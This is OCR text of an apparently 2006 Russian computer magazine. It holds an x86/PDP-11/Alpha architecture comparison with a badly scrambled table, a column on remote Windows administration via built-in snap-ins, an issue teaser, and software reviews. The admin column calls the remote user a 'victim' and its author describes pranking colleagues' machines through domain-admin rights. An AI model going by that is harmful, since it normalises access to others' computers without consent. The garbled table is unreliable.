ка, а ведь 8086 и был 16-разрядным! Можно, ко- 
нечно, пойти на хитрость и адресовать память не 


байтами, а словами (и некоторые процессоры 
именно так и делают!), — тогда объем непосред- 
ственно адресуемой памяти возрастет до 128 Кб, 
но... Во-первых, это все равно не выход, а во-вто- 
рых, такое решение идет вразрез с требованием 
об обратной совместимости. Наконец, сам объем 
непосредственно адресуемой памяти, — каким бы 
большим он ни был, — еще ничего не дает! И что- 
бы им эффективно воспользоваться, необходимо 
иметь как минимум возможность создания пере- 
мещаемых программ, — то есть, попросту гово- 
ря, уметь загружать программу в любое место па- 
мяти. Многие микрокомпьютеры начала восьми- 
десятых (в том числе и те, что были собраны на 
базе 8080) выделяли программам фиксированные 


РОР-11 

серия 16-разрядных мини-ЭВМ компании 
ОЕС, серийно производимых 

и продаваемых в 70-х — 80-х гг. ХХ века. 
Серия РОР-11 была развитием серии 
РОР-8 из общей линейки 

компьютеров РОР 


18086 

первый 16-битный процессор компании 
Intel, выпущенный 8 июня 1978 года. 
Процессор имел набор команд, который 
применяется и в современных 
процессорах, именно от этого процессора 
берет свое начало известная сегодня 
архитектура x86 


DEC ALPHA 

также известный Kak Alpha AXP, — 
64-разрядный RISC микропроцессор, 
первоначально разработанный 

и произведенный компанией DEC, 
которая использовала его в собственной 
линейке рабочих станций и серверов. 
Микропроцессор был создан 

для компьютеров, которые придут 

на смену серии VAX и изначально 
поддерживал операционные системы 
VMS и DEC 


(c) Wikipedia.org 


участки памяти, и потому загрузка нескольких 
программ становилась весьма проблематичной. 
(В частности, «Stealth»-oTnagunku тех лет грузили 
себя в буфер экранной памяти, отъедая несколь- 
ко нижних строк, и, естественно, код отладчика 
отображался на терминале в виде бессмысленно- 
го мусора, зато такой отладчик не конфликтовал 
с программами!). К более подробному обсужде- 
нию преимуществ и недостатков сегментной мо- 
дели памяти мы еще вернемся, а пока же заметим 
лишь то, что сегментная организация памяти нам- 
ного удобнее страничной адресации, используе- 
мой в машинах типа РОР-11 и намного дешевле 
32-разрядных указателей, используемых в про- 
цессорах типа 68 К © 


ЭТО ВЕДЬ ДЕЙСТВИТЕЛЬНО ТАК — Х86 ОБЛАДАЕТ САМОЙ ИДИОТСКОЙ 
АРХИТЕКТУРОЙ И САМЫМ НЕЛЕПЫМ НАБОРОМ КОМАНД ИЗ ВСЕХ 
НЫНЕ СУЩЕСТВУЮЩИХ ПРОЦЕССОРОВ. ТАК ЧТО ЖЕЛАНИЕ ИЗУЧИТЬ 
ЕГО ДОСКОНАЛЬНО КАЖЕТСЯ МНЕ ВЕСЬМА СОМНИТЕЛЬНЫМ 
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Тип процессора 


безоперандная, одно- 
и двухоперандная 


Сводная таблица сравнительной элегантности программной модели различных процессоров 


безоперандная, одно- 
и двухоперандная 


DEC Alpha 


Основные характеристики 


безоперандная, одно- 
и двухоперандная 


RISC 


система команд 


Система команд 


безоперандная, одно- 
двух- и трехоперандная 


Размер машинной команды 


от 1 до 16 байт 


1,2 или 3 слова 


oT 1 до 12 слов 


одно двойное слово 


Типы команд 


пересылки данных, 
арифметические, 
логические, управления, 
системные 


пересылки данных, 
арифметические, 
логические, управления, 
системные 


пересылки данных, 
арифметические, 
логические, управления, 
системные 


пересылки данных, 
арифметические, 
логические, управления, 
системные 


Система кодировки 
машинных команд 


синтаксис команд 
чрезвычайно сложен, — 
инструкции имеют перемен- 
ную длину и множество 
факультативных контекст- 
но-чувствительных полей 


синтаксис команд 
чрезвычайно прост, 
логичен, интуитивно 
понятен 


синтаксис команд доволь- 
но сложен, инструкции 
имеют переменную длину 
и множество факультатив- 
ных контекстно-чувстви- 
тельных полей 


синтаксис команд 
упрощен до предела 


Система кодировки по компактности по скорости выполнения ’неоптимизирован по скорости выполнения 
оптимизирована и легкости чтения в ущерб компактности 
в машинных кодах 

Параллелизм параллелизм не заложен параллелизм не заложен параллелизм не заложен- параллелизм не заложен 
явно, более того, система явно, но создание супер- явно, более того, система явно, но система команд 
команд всячески препятст- скалярных процессоров команд всячески препятст- оптимизирована под парал- 
вует созданию суперскаляр- в данной системе команд  вует созданию суперскаляр- лельное исполнение 
процессоров осуществляется легко ных процессоров 

Выравнивание наличие команд длиной все команды кратны все команды кратны все команды равны 
в байт, вызывает проб- размеру слова и потому размеру слова и потому длинному слову и потому 
лемы с выравниваем кода всегда выровнены всегда выровнены всегда выровнены 

Происхождение насильно навязан Data Point, оригинальный набор, базирующийся на PDP-11, нет данных 

набора команд заказавший Intel разработку разработанный без учета но существенно пересмот- (по-видимому, оригиналь- 
чипа для своих терминалов. — обратной совместимости, ренный и переработанный ная разработка DEC) 


Поддержка стека 


Стремление руководства Intel 
обеспечить обратную совмес- 
тимость процессоров после- 
дующих поколений с неизбеж- 
ностью привела к отказу 

от лучших решений 

в пользу уже имеющихся 


один стек 


что превратило PDP-11 

в могильщика огромного 
количества ранее написан- 
ного программного кода, 

и причем очень хорошего 


много 


набор команд 


много 


стековые операции 


Поддержка очередей 


отсутствует 


процедурные средства 


Команды вызова процедур частично — адрес возврата e адрес возврата может быть — 
всегда заносится на вершину сохранен где угодно, 
стека, параметры передаются аргументы могут переда- 
вручную ваться как вручную, 
так и автоматически 
Манипуляции с кадром стека © — e — 
Возврат с автоматическим e e e = 


закрытием кадра стека 


Пересылка групп регистров 


ограничено (только в стек) 


команды пересылки 


Пересылка данных 


периферийным устройствам 


Пересылка 
непосредственных данных 


Обмен регистров 


команды обмена 


Обмен ячеек памяти 


> 
о 


циклы 


Поддержка циклов весьма ограниченная, — поддерживается цикл, отсутствуют отсутствуют 
поддерживается лишь цикл, стремящийся к нулю, 
стремящийся к нулю, причем счетчик которого может 
счетчик цикла жестко привя- находится в любом 
зан к регистру ЕСХ/СХ. регистре или 
Команда цикла исполняется ячейке памяти 
крайне неэффективно 
и ее использование 
не рекомендуется 
Байтовые операции расширение, перестановка байтов попарное сравнение, 
извлечение О и 1 байта логична, интуитивна извлечение, вставка (!), 
из некоторых регистров, маскирование, 
(в MMX: ...) заполнение 
Разбить длинное слово, — — ® = 


хранящееся в регистрах 
на байты 


Подсчет кол-ва битов 
и др. битовые команды 


часто используемые математические операции 


Команда очистки 


отсутствует, используется 
команда пересылки 


битовые операции 


отсутствует, но может 
читаться «черная» дыра 


Команда обращения знака 


прочие архитектурные особенности 


Встроенные есть, начиная с Pentium, зачаточные зачаточные зачаточные 
средства отладки чрезвычайно богатые 
Мониторинг 
производительности есть, расширенный — — есть: счетчик циклов 
Команды предвыборки «ручная», начиная с Р-Ш — — e 

v Athlon, и автоматическая, 

начиная сР-4 
Возможность заливки — — — e 


собственных микропрограмм 


выводы 


Субъективные впечатления 
от удобства 
программирования 

на ассемблере 


очень развитая система 
команд, работать 

с ним легко, приятно 

и удобно, за исклю- 
чением незначительных 
заморочек с отсутствием 
адресации память-память 
и жесткой привязки 

к регистрам в командах 
IN, OUT, MUL u DIV 


очень элегантный 
чрезвычайно удобный 
в работе ассемблер, 
«делающий» x86 

уже за счет развитой 
системы адресации 


ликвидирует слабые 
места РОР и обладает 
практически всеми 
приятностями х86 


крайне обедненный 
ассемблер, ручная 
работа на котором 
превращается из 
удовольствия в рутину, 
тем не менее, в нем 
нем есть свое 
очарование, 

за которое его 

можно полюбить... 


Богатство сопроцессора 


чрезвычайно богатый 
набор команд, 
включая всю 
тригонометрию 
иеще много чего 


= богатый набор команд 


минимальный 
набор команд 


ОФФТОПИК 


soft 


НАСТРОЙКА FIREWALL. ПРОДОЛЖЕНИЕ 
МИХАИЛ ФЛЕНОВ 
(HTTP://WWW.VR-ONLINE.RU) 


> права доступа. Прежде чем Ha- 
чать рассматривать удаленный кон- 
троль, необходимо определиться 

с правами доступа. Если у тебя сеть 
построена на основе контроллера 
домена Windows NT/2000/2003, 

то по умолчанию администратор до- 
мена имеет права локального адми- 
нистратора на всех компьютерах се- 
ти. Хочешь убедиться? 

Если у тебя есть доменная 
сеть, то запусти на своем компьюте- 
ре оснастку «Управление компьюте- 
ром» (Computer Management). 

Это можно сделать из «Панель 


Просмотр групп пользователей 
через оснастку «Управление 


компьютером» 


управления» > «Администрирова- 
ние» или просто щелкнув правой 
кнопкой по «Мой компьютер» и вы- 
брав меню «Управление» (Мападе). 
Здесь в дереве объектов слева вы- 
бери раздел «Управление компью- 
тером -* Служебные программы > 
Система -» Локальные пользовате- 
ли и группы > Группы» (Computer 
management -+ System tools > 

Local Users and Groups > Groups). 
Справа должен появиться список 
всех групп. Щелкни в нем дважды 
по группе «Администраторы» (Admi- 
nistrators) и здесь в списке 

ты увидишь помимо своей учетной 
записи (если ты, конечно, 
локальный админ) еще и админи- 
страторов домена. 
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Что дают права «локального бога» 
администраторам домена? Они име- 
ют полный контроль над твоей ма- 
шиной (дальше мы это увидим). 
Если ты не хочешь, чтобы без твое- 
го ведома у тебя в машине кто-то 
ковырялся, срочно удали админи- 
страторов домена из группы «ло- 
кальных богов». Если ты сам «бог» 
своей сети, то должен контролиро- 
вать, чтобы пользователи не выки- 
нули тебя из локальных администра- 
торов на своих компьютерах. 

Если доменной сети нет, 
то для удаленного управления 
необходимо знать пароль админи- 
стратора компьютера, которым 
ты хочешь управлять. Теперь, чтобы 
коннект прошел удачно, установи 
себе этот же пароль, иначе могут 
быть проблемы с соединением. 

Внимание! У тебя должен быть 
Windows из серии сервера или Рго- 
fessional. B Windows ХР Home Edition 
работа в домене заблокирована. 

Я слышал, что умельцы, вроде бы, 
вводили Windows НЕ в домен, 

но сам не пробовал, поэтому под- 
твердить эту информацию не могу. 

Итак, чтобы можно было уда- 
ленно управлять чужой тачкой, у те- 
бя должно быть одно из двух: 

1 Ты должен быть администра- 
тором домена, и при этом на уда- 
ленной машине ты «локальный бог». 

2 Ты знаешь пароль админа 
жертвы и установил себе такой же. 

Если хотя бы одно из этих 
условий выполнено, удаленный кон- 
троль будет возможен. 
> — реестр. Одна из частых задач, 
с которой приходиться сталкивать- 


ся администратору — это правка 
реестра и управление правами до- 
ступа к нему. Чтобы подправить ре- 
естр, совсем не обязательно под- 
ключаться к удаленной машине. 
Достаточно запустить regedit на 
своем компьютере и выбрать меню 
«Подключить сетевой реестр» (Соп- 
nect Network Registry) из меню 
«Файл» (File). Перед тобой появить- 
ся окно, в котором можно выбрать 
компьютер, реестр которого ты хо- 
чешь подключить. Введи имя ком- 
пьютера в большое окно ввода 

и нажми ОК. Если у тебя есть нуж- 
ные права, и имя введено правиль- 
но, то в окне regedit появится еще 
одна корневая ветка, в которой бу- 
дет реестр удаленной тачки. 

Теперь управляем удаленным 
реестром так же, как и своим соб- 
ственным. Не знаю, почему многие 
запускают для правки реестра RAd- 
min, когда проблема решается нам- 
ного проще и с большой экономией 
трафика. 
> — полный контроль. Для управле- 
ния собственным компьютером мы 
используем оснастку «Управление 
компьютером» (Сотрщег Мападе- 
ment), но многие почему-то не знают 
об этом. Через эту оснастку также 
можно подключиться к машине 
пользователя и управлять ей, как 
своей собственной. Выполняем сле- 
дующие действия: 

1 Запусти оснастку; 

2 Выбери в дереве объектов 
первый пункт — «Управление ком- 
пьютером» (локальный); 

3 Выбкри меню «Действия > 
Подключение к удаленному компью- 


теру» (Action > Connect to another 
computer). 

Если второе действие не выпол- 
нить, то меню, описываемое в третьем 
действии, не будет доступно! 

Появится окно подключения 
к компьютеру. Здесь два переключа- 
теля — локальный компьютер и уда- 
ленный. Выбери второй вариант 
и введи имя компьютера. Если у те- 
бя достаточно прав, то подключение 
пройдет удачно. 
> — просмотр событий. Что мы мо- 
жем теперь делать? Да все то же 
самое, что и с локальным компьюте- 
ром. Допустим, что тебе звонит 
блондинка... Стоп, не будем перехо- 
дить на личности, ведь далеко не 
все блондинки такие, как в анекдо- 
тах. У меня жена тоже блондинка... 
Но тут я уж точно промолчу. 

Короче, тебе звонит пользова- 
тель (пол и цвет волос не уточня- 
ем), который не дружит с англий- 
ским и сообщает, что Windows или 
другая программа проматерилась 
на английском. Попытки пользова- 
теля прочитать сообщение не при- 
водят ни к чему хорошему. Ну да 
ладно, подключаемся с помощью 
оснастки «Управление компьюте- 
ром» и смотрим системные сообще- 
ния в ветке событий «Служебные 
программы — Просмотр» (System 
tools > Event Viewer). Здесь есть 
три подраздела: 

1 Приложения (Application) — 
здесь различные приложения оста- 
вляют свои предупреждения и сооб- 
щения об ошибках. 

2 Безопасность (Security) — 
здесь система осуществляет свои 
сообщения, касающиеся безопасно- 
сти — смена паролей, блокировки и 
так далее. Если пользователь не мо- 
жет войти в свой компьютер, то под- 
ключись и посмотри сообщение в 
журнале безопасности. Возможно, 
сообщения помогут тебе быстро ре- 
шить проблему, а заодно и сэконо- 
мить тонну трафика. 

з Система (System) — здесь 
система оставляет свои сообщения. 
По моим наблюдениям, сообщения 
в основном помещаются сюда 
на этапе загрузки ОС, но могут по- 
падать и во время работы. 

В Windows 2003 может быть 
больше разделов. Например, если 
у тебя установлена репликация, 
DNS и активная директория, то по- 
явятся соответственно разделы File 
Replication Service, DNS Server и Di- 
rectory Service. 
> управление шарами. Для уда- 
ленного управления шарами нам 
снова понадобится оснастка «Упра- 
вление компьютером». Раскрой вет- 
ку «Служебные программы > Общие 
папки» (System tools Shared Fol- 


Подключение 
к удаленному реестру 


ders). Здесь находится три папочки: 

1 Общие ресурсы (Shares) — 
открытые ресурсы (папки или дис- 
ки). Чтобы закрыть какой-то из ре- 
сурсов, который пользователь от- 
крыл по своей оплошности, щелкни 
по нему правой кнопкой мыши 
и выбери в появившемся меню Stop 
sharing. Если необходимо открыть 
какой-то ресурс для пользователей, 
снова щелкаем правой кнопкой 
и выбираем пункт меню New share. 
При этом в списке шаров не дол- 
жно быть ничего выделенного. 
Только не забудь, что ты подклю- 
чен к чужому компьютеру, 

и необходимо указывать коррект- 
ный путь именно для него. 

2 Сеансы (Session) — здесь 
можно промониторить, кто сейчас 
подключен к данному компьютеру 
и сколько ресурсов открыто. 

з Открытые файлы (Ореп 
Нез) — здесь нам покажут, какие 
именно файлы или папки открыты 
и каким пользователем. 

Управление шарами можно ис- 
пользовать не только для контроля 
открытых ресурсов в твоей локаль- 
ной сети, но и для просмотра того, 
кто и что открывает на твоем ком- 
пьютере. Ты хоть иногда следишь 
за открытыми шарами? Нет? А зря. 
У меня на работе админ такой же 
растяпа. Мне как программеру 
необходимы права «бога» в домене, 
чтобы я мог управлять пользовате- 
лями напрямую, а у нашего админа 
администраторы домена не отклю- 
чены из «локальных богов». Поэто- 
му я иногда прикалываюсь. Конечно, 
чужой диск я не просматриваю, по- 
тому что не имею такой дурной при- 
вычки, но поле деятельности для 
шуток достаточно большое. 


Я сам себе бог, а админы 
домена мне не указ 


= № ty Computer 
@ (© HKEY_CLASSES ROOT 
+) Sy HKEY_CURRENT_USER 
ш ($ HKEY_LOCAL МЕСТЕ 
+ 3) HKev_users 
> Gj HKEY_CURRENT_CONFIG 


> — сникерсни! Когда мне говорят, 
что сервер тормозит, я не спешу 
подключаться к нему удаленно че- 
рез RAdmin, ведь это все равно даст 
плохой результат с точки зрения 
диагностики. Программа RAdmin — 
не волшебник и не может сидеть 
в системе, не поедая ресурсов, осо- 
бенно сетевых, поэтому реальную 
производительность, учитывая ми- 
нус расходов процессора на обслу- 
живание программы, рассчитать 
сложно. Из-за такого удаленного 
подключения лишняя нагрузка ло- 
жится и на сетевые драйверы, 
а ведь нужно еще запустить ка- 
кое-то средство диагностики. 

А не лучше ли запустить утили- 
ту диагностики у себя на компьютере 
и подключиться к удаленной маши- 


не? Конечно же, лучше, и это BO3- 
можно сделать средствами наших 
любимых/не любимых (ненужное за- 
черкнуть) Окошек. Заходим в «Па- 
нель управления», затем «Админи- 
стрирование» и запускаем оснастку 
«Производительность». В дереве 
слева выбираем пункт «Системный 
монитор» и наслаждаемся графика- 
ми производительности. По умолча- 
нию нам будут показывать состояние 
трех параметров — памяти (обмен 
страниц в секунду), диска (длина 
очереди диска) и загруженности про- 
цессора. Все очень наглядно, потому 
что каждый параметр рисуется лини- 
ей своего цвета. 

Черт побери! Это же парамет- 
ры моего компьютера, а нам нужно 
промониторить сервер по имени 


Adminastrator 


Фанов Лето (S-1-5-21-3350935111-340971914-1896828370 


select Lomputer 


Select this object tyne 


My Computer\HEEY CURRENT USER 
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Подключение к удаленному 


компьютеру 


MainServer. Не проблема. Шашки 
наголо, и нажимаем кнопки Ctrl+l. 
Перед тобой откроется окно добав- 
ления счетчика. Обрати внимание, 
что вверху есть переключатель — 
«Использовать локальные счетчики 
или выбрать счетчики с компьюте- 
ра». Если выбрать второй вариант, 
то можно будет ввести имя ком- 
пьютера, параметры которого нас 
интересуют. 

После этого нужно опреде- 
литься с параметром, который мы 
хотим проконтролировать. В выпа- 
дающем списке выбираем объект, 

и чуть ниже уточняем, какой именно 
параметр ты хочешь проконтроли- 
ровать. Если какой-то параметр не 
понятен, не стесняйся нажать кноп- 
ку «Объяснение» и воспользоваться 
подсказкой. Продвинутые админы 
тоже иногда должны пользоваться 
подсказками, тут ничего зазорного 
нет. Если стесняешься, прикрой мо- 
нитор рукой или поверни его так, 
чтобы никто не видел. Когда опре- 
делишься и выберешь, что нужно, 
нажимай кнопку «Добавить». 

Из личных наблюдений: ни ра- 
зу не видел, чтобы кто-то использо- 
вал эту оснастку даже для локаль- 
ного мониторинга, не говоря уже об 
удаленной машине. Большинство 
админов предпочитают подойти 
к серверу или подключиться через 
RAdmin, нажать заветные три бу- 
квы, то есть Ctrl+Alt+Del, и наблю- 
дать за производительностью 
здесь. Не понимаю, почему так? Да, 
три клавиши нажать легче, но там 
информации очень мало, чтобы 
сделать хоть какие-то умозаключе- 
ния о реальной производительно- 
сти. А если учесть, сколько калорий 
уходит на то, чтобы физически по- 
дойти к серверу для нажатия кла- 
виш, то понимаешь, почему админы 
худые, несмотря на питание гамбур- 
герами. Оснастка «Производитель- 
ность» (Perfomance) намного ин- 
формативнее, удобнее и нагляднее 
демострирует данные при удален- 
ном мониторинге. 


> — служу Советскому Союзу! 
Иногда приходят жалобы, что на- 
крылась какая-то служба или она 
вообще не была установлена в авто- 
старт, а тут вдруг понадобилась. 
Чтобы исправить положение, и сде- 
лать это эффективно, нужно под- 
ключиться к удаленному диспетчеру 
служб. И самое интересное, что ос- 
настки Windows умеют это делать. 
Во-первых, службами можно упра- 
влять через «Управление компьюте- 
ром». Эту оснастку мы уже рассма- 
тривали, и в ней есть раздел «Служ- 
бы и приложения» > «Службы». 

А можно использовать и более 
привычную оснастку «Службы», ко- 
торая находиться в «Панели упра- 
вления» > «Администрирование». 
Запусти эту оснастку и выбери меню 
«Действие» -+ «Подключение к уда- 
ленному компьютеру». Перед тобой 
должно открыться окно для выбора 
компьютера. Где-то мы это окошко 
уже видели. Я думаю, дальнейшие 
комментарии по управлению служ- 
бами излишни. 


> движение далее. Как видишь, 
очень многое можно сделать без за- 
грузки прожорливых в отношении 
трафика утилит RAdmin или Da- 
meWare. Пользуйся оснастками Win- 
dows, ведь они достаточно удобны 

и эффективны не только в локаль- 
ной настройке, но и в удаленной. А 
самое главное, встроенные утилиты 
уже установлены и ничего не будут 
тебе стоить, т.е. абсолютная халява! 
Ну, разве это не счастье! 

Я рассказал только про основ- 
ные оснастки, которые сам исполь- 
зую для удаленного управления 
и мониторинга в своей сети/домене. 
Но это не предел. Большинство ос- 
насток, которые ты можешь уви- 
деть в «Панель управления» —«Ад- 
министрирование» умеют удаленно 
работать с другими компьютерами. 
Рассматривать их все не имеет 
смысла, потому что принцип рабо- 
ты почти везде одинаковый — вы- 
брать меню «Действие» —>«Подклю- 
чение к удаленному компьютеру». 
В этом отношении отличается толь- 
ко оснастка контроля производи- 
тельности. Но попытка описать все 
отняла бы очень много времени, 
ведь в Windows 2003 при устано- 
вленной активной директории и 
всех установленных сервисах па- 
нель администрирования просто пе- 
реполнена. Именно поэтому я огра- 
ничился основными параметрами 
системы, которые мы используем 
чаще всего и которые могут приго- 
диться тебе. 

В Windows 2003 оснасток еще 
больше, и для удаленного управле- 
ния ими со своего компа тебе тоже 
придется ставить Windows 2003, что- 
бы такие же оснастки были и в тво- 
ей тачке. Если не хочешь держать 


такого монстра у себя, то оснастки 
можно перенести на Windows Profes- 
sional или воспользоваться сторон- 
ними утилитами, предоставляющи- 
ми удаленное управление. 

> — итог. Напоследок хочу расска- 
зать об одной поучительной про- 
граммулинке. Недавно видел про- 
граммку российского производства, 
которая умеет сканировать сеть 

на наличие компьютеров, сканиро- 
вать порты, пинговать и управлять 
удаленным компьютером. Удален- 
ное управление включает в себя 
работу с реестром, просмотр шар- 
сервисов и пользователей, ну, и 
еще пару параметров. Короче, воз- 
можности удаленного управления 
примитивны, программа ужасна, 

а сканеры сети, портов и пингер 
можно найти в инете совершенно 
бесплатно. 

А знаешь, сколько стоит эта 
программа? Ты не поверишь — бо- 
лее $100. Точную сумму не буду на- 
зывать, чтобы ты не упал в обморок, 
потому что она стоит больше, чем 
Windows Home Edition! Нет, я не ру- 
гаю разработчика за наглость, 

я восхищаюсь. Если программа ре- 
ально продается и приносит при- 
быль, то разработчик — молодец, 
а админы, которые платят за нее де- 
ньги — лохами были и останутся. 
Изучай возможности Windows и ты 
сэкономишь уйму денег и времени, 
и тебя не разведут, как ламера, 

на примитивную и ненужную про- 
грамму, стоящую, как целая опера- 
ционная система. Удачи всем, и до 
новых встреч © 
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4) Узедомпение 29.11.2906 
a) Узедомление 29.11.2006 
Ww Узедомпение 29.11.2006 
З)уУведомление 29.11.2006 
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У Узедомление 29.11.2 
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4) Уведомление 28.11.2006 
BD Уведомление 28.11.2006 
З)узеломпение 28.11.2006 
Уведомление 28.11.2006 
Зр Уведомление 28.11.2006 
ЗРУзеломпение 28.11,2006 
З)Узедомпения 28.11.2906 
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19:45:20 Service Control Manag 
19:45:20 Service Control Manag 
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23:04:33 eventlog 

23:04:27 Windows Update Agen 
23:03:59 М5енлсеРаск 

23:03:09 Service Contrel Manag 
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XSS И SQL INJECTION 


В СЛЕДУЮЩЕМ НОМЕРЕ: 
БЕЗОПАСНЫЙ $0Е-КОДИНГ 

ПРИМЕР РЕАЛЬНОЙ ХХ$-АТАКИ И ЗАЩИТЫ ОТ НЕЕ 
ПРОГРАММЫ ДЛЯ АВТОПОИСКА УЯЗВИМОСТЕЙ 
ПРОВЕДЕНИЕ $0©1-ИНЪЕКЦИЙ 

ОБЗОР РЕСУРСОВ ПО БЕЗОПАСНОСТИ 

АТАКИ ТИПА CRAFTING SYMLINKS: 

ТЕХНОЛОГИИ И ПРИМЕР ЭКСПЛОИТА 


РАССКАЗЫ О ДЕМОМЕЙКИНГЕ: ТЕХНОЛОГИИ, 
ПРОГРАММИРОВАНИЕ, ИЗВЕСТНЫЕ ЛЮДИ МИРА 
ДЕМОК И МНОГОЕ ДРУГОЕ ОБ ЭТОМ 

КРАСИВОМ ЯВЛЕНИИ. 
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ПОДБОРКА СВЕЖИХ ПРОГРАММ ОТ СПЕЦА 
ЮРИЙ НАУМОВ 


ExeScript 2.1.1 

hide-folder.com 

Shareware 

Дополнительный инструмент в коллекцию твоих 
конвертеров. ExeScript предназначен для конверти- 
рования Ба{-файлов, а Tak же Visual Basic 

Scripts (.vbs) и Java Scripts (.js) в исполняемый 
ехе'шник. Процесс конверта проходит быстро и 3a- 
нимает лишь несколько секунд. В программе суще- 
ствует возможность блокировки изменений файлов 
указанных форматов. Для кодеров и не только. 


HTTP File Server 2.1 

rejetto.com 

Freeware 

Сталкивался с проблемой, когда срочно нужно 
выложить в Сеть нехилый по весу архив для пря- 
мого скачивания? При этом файл-хостинги не 
дают столько места, а перспектива установки 
сервера не особо радует? Ну а если и не сталкивался, 

то уверен, что столкнешься. Поэтому посоветую крохотную 
программулину (0.5 Mb) — HTTP File Server. Она поможет 
без всяких проблем выкладывать в Сеть информацию па- 
рой кликов: add files, add folders. Все это моментально ста- 
новится доступно (http://your_ip), если, конечно, у тебя ста- 
тический ip. Сервер прост в использовании, быстр и порта- 
тивен, что немаловажно в наши сложные времена. 


Miranda@HotCoffee Final 

ego-brain.com 

Freeware 

Соглашусь, что сборок этого многими любимого мессендже- 
ра в Сети очень много. Но эту максимально сбалансирован- 
ную и функциональную сборку я просто не мог обойти вни- 
манием. Продуманный и обновленный подбор плагинов, 
удобная структура меню, наконец — красота и эстетика 
пейджера заставили меня оставить свежую Миранду у себя 
на винте. В общем, полная и качественная переработка из- 
вестного средства интернет-общения. Должна понравиться. 


Hamachi 1.0.1 
hamachi.cc 

Freeware 

Hamachi — очень интересная 
программа, позволяющая созда- 
вать виртуальную локальную 
сеть через интернет. Это позво- 
лит соединить компьютеры, 

не имеющие собственных стати- 
ческих !р-адресов. 

В виртуальной локалке 
можно выполнять все те же 
самые действия, что и в реаль- 
ной: запускать hitp и ftp, играть 
в С$, юзать шаринг. При этом 
безопасность абсолютно всех 
подключений обеспечивается 
шифрованием соединения с ис- 
пользованием самых эффектив- 
ных и крепких алгоритмов и про- 
токолов. Подключение произво- 
ДИТСЯ С ПОМОЩЬЮ «стороннего» 
компьютера — сервера произво- 
дителя, но трафик через него ид- 
ти не будет. Поэтому скорость 
виртуальной локалки будет нап- 
рямую зависеть от скорости ин- 
тернет-подключения. 


Keyhole 
keyhole.com 
Shareware 


в сборе информации. 


Помнишь фильмы про шпионов и секретные службы? Те, в которых 
правительственные служащие рыщут по земному шару одним скрол- 
лом на мышке, изменяя размеры изображения от материка до городс- 
ких улиц, причем совершенно без потери качества. Keyhole — самая 
близкая к этому реализация такого трехмерного земного шара. Вес 
9,6 Мб — это только оболочка, сами карты грузятся из Сети. Мозаика 
планеты собирается из фотографий спутника в совокупности с точны- 
ми картографическими данными. Карта проработана пока не пол- 
ностью, например нашу Родину видно довольно-таки плохо. Зато не- 
которые другие местности детализированы вплоть до аэропортов, 
школ и ресторанов. В общем, отличная идея движка, но проблема 


Handy Password 3.9 SIV 3.18 
handypassword.com siv.mysite.wanadoo-members.co.uk 
Freeware Freeware 


Очень даже неплохой и довольно безопасный менеджер па- 
ролей. Handy Password хранит данные, защищая их 128-бит- 
ным алгоритмом шифрования. Теперь ежедневный серфинг 
Сети станет гораздо более безопасным и удобным: менед- 
жер запоминает ло- 
гин-информацию, 
после чего на сайты 


System Information Viewer — крохотная программулина, в силах которой поведать 
о компьютере ВСЕ! Ничего лишнего, никаких красивых кнопочек или просьб пла- 
тить за пользование, главное одно — функциональность. Чего в ней только нет... 
Здесь не только подробная информация обо всем установленном железе, но и де- 
тальный рассказ о прог- 
раммном обеспечении 

и сети. Даже перечислять 
не стану все, что она зна- 
ет, смотри сам. Програм- 
ма висит в трее и не тре- 
бует установки, поддержи- 
вает русский язык. Дос- 
тойный инструмент, заме- 
няющий множество других 
систем-вьюверов даже 

в совокупности. Must have! 


wm ` с авторизацией захо- 
es вия № — 


дить станет намного 
проще благодаря ав- 
томатическому за- 
полнению форм. 

В программу также 
включен генератор 
паролей и менеджер 
закладок. 


MAPILab File Recovery 

for Office 1.8 

mapilab.com/ru 

Shareware 

Эффективное и мощное средство восстанов- 
ления потерянных данных офисных докумен- 
тов (Word, Excel, PowerPoint, Visio, Access) 

с различных типов носителей: HDD, Flash, 
MMC, SD и тому подобных. Неосторожное уда- 
ление, поломка, форматирование носителя — 
случаи, когда программа очень даже пригодит- 
ся. Обидно, когда почти доделал курсовой про- 
ект или отчет для начальника, а весь труд сго- 
pen по чьей-то неосторожности. File Recovery 
проста в использовании, а для «продвинутых» 
предусмотрен специальный режим со специ- 
фическими настройками. Качай, если тебе до- 
рог твой собственный труд. 


Seep € of he View and recover flea after file system acer 
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RAdmin 3.0 beta 2 
radmin.com 
Shareware 


Обновился несомненно один из лучших инструментов удаленного адми- 
нистрирования. RAdmin — уже давно зарекомендовавшая себя.Тулза, 
позволяющая работать сразу на нескольких удаленных компьютерах 

с полной свободой действий, независимо от места расположения — 

в интернете или локальной сети. Одним из главных достоинств «радми- 
на» является надежная защита при передаче данных и возможность до- 
вольно долгой работы без сбоев. Для использования подходит любое со- 
единение, поддерживающее протокол TCP/IP. В средство встроен текс- 
товый чат, позволяющий обмени- 
ваться сообщениями в реальном 
времени как в публичном, 

так и в приватном виде с использо- 
ванием каналов. В новую версию 
также добавлен и голосовой чат — 
возможность проведения удален- 
ных конференций, и еще множество 
доработок и исправлений. 


Audio Grail 6.6.8 
kcsoftwares.com 
Shareware 

Свежая версия программы для работы с ay- 
дио, окрещенная «швейцарским ножом». 
Число инструментов для работы с аудио-фай- 
лами в этой программе внушает уважение — 
все в одном: здесь и работа с именами фай- 
лов, добавление/изменение тегов, возмож- 
ность анализа качества звука, каталогизиро- 
вание аудио-коллекции и поиск дубликатов. 
Также можно создавать аудио-диски и от- 
дельно составлять плейлисты (M3u, pls, xpl). 
Все операции программа может выполнять 

в автоматическом режиме. Софтина поддер- 
живает все самые основные аудио-форма- 
ты (MP3, WAV, OGG, ААС, APE, MPC и дру- 
гие). Уважает русский язык. Меломанам 

и не только... 


DFX 8 Audio Enhancer 
fxsound.com 

Shareware 

Новая версия хорошего звукового плагина 

для многих плееров: Winamp, Media Player, 
Jukebox, Real Player, Sonique. Разработка приз- 
вана заметно улучшать качество звука, с чем 
вполне успешно справляется. Работа этого 
плагина, как и подобных ему, построена на 
усовершенствовании частотных характеристик 
звука: добавление эффекта объемности, 3d- 
surround и т.п. В новой версии разработчики 
потрудились над интеграцией в плееры, внесли 
изменения собственно в работе, облагородили 
интрерфейс. Неплохой плагин, хотя я все же 
рекомендую Iztope Ozone. 


NikSaver 1.6.1 
niksaver.com 


Shareware/Freeware 

Мегаполезная софтина для тех, кому 
жалко тратить свое драгоценное время 
на осуществление всевозможных настро- 
ек ОСи, софта и игр. Последнее время 
все чаще идут дискуссии по поводу 

рома е-софта. Здесь похожее решение: 
вся информация о хранении настроек той 
или иной обвески (будь то регистр или 
шЕфайл) находится в так называемых 
